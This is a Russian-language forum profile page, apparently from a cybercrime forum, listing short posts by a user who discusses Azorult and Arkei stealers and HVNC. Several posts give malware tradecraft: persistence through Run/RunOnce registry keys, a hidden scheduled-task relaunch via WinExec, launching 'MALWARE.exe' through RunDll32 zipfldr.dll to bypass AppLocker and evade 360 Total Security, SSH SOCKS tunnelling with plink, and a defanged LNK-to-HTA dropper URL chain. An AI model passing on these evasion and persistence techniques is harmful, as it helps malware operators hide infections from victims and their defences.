Перейти к содержанию

CrydBrox

Пользователь
  • Публикаций

    32
  • Зарегистрирован

  • Посещение

Репутация

81 Excellent

Информация о CrydBrox

  • Звание
    Rank №2
  1. Покупал серт, очень доволен, селлер адекватный. Рекомендую
  2. Подозрительный LNK файл HVNC

    Выполняет HTA по линку хттпс://is.gd/8nWF3h --(redirect)--> хттп://zzerd23z.zzz.com.ua/sdwgdt54fdbcgd1s/kol25.hta По линку сейчас 404 В HTA можно встроить JScript или VBS код, по сути тут ярлык это тоже самое что и простой JS-лоадер(ну или дроппер, хз что было в этом HTA)
  3. билд Azorult

    Крид в твoрчeскoм прoцecce и рeдкo сeйчаc в джaббeрe
  4. Интервью с автором Arkei

    Ага, здрасьте, это с автором Arkei
  5. Не Крида ли это закрыли ?

    Не Крида
  6. Профиль ВК узнать можно, при условии что он залогинен в этом же браузере
  7. Линк не работает No route found for "GET /sshmanager/myPrivacy_scr.zip"
  8. plink.exe -ssh 1.2.3.4:22 -C -N -l root -pw qwerty -D 8081 -v 1.2.3.4:22 - ip:port ssh root - login qwerty - password
  9. Не нужно ничего делать на сервере, берешь pytty или plink, запускаешь с параметрами как выше написали, putty подключается к серверу по ssh, и подымает локальный сокс на твоем пк. Подключаясь к этому соксу, putty перенаправляет траф через сервер к которому подключена. То есть например если ты firefox настроишь на работу через этот сокс, то коннект такой будет "Firefox->(socks5->SSH)->internet"
  10. а HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce палит?
  11. Не нужны. Вместо calc.exe можно еще REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" ....", только с кавычками поиграться придется
  12. Перезапуститься через планировщик заданий SCHTASKS /CREATE /TN blabla /SC once /ST 13:37 /TR "calc.exe" /F 13:37 - время когда запустится "calc.exe", то есть к текущему времени прибавляешь одну минуту и WinExec('SCHTASKS /CREATE /TN blabla /SC once /ST 13:37 /TR "calc.exe" /F', SW_HIDE);
  13. Не, ты видимо про что-то другое подумал. Это просто один из методов обходов Applocker (еще https://github.com/api0cradle/UltimateAppLockerByPassList). То есть процесс MALWARE.exe запустится от родительского RunDll32.exe. Возможно это поможет с 360Total
  14. RunDll32.exe zipfldr.dll,RouteTheCall MALWARE.exe Попробуй так
  15. Попробуй https://github.com/api0cradle/UltimateAppLockerByPassList
×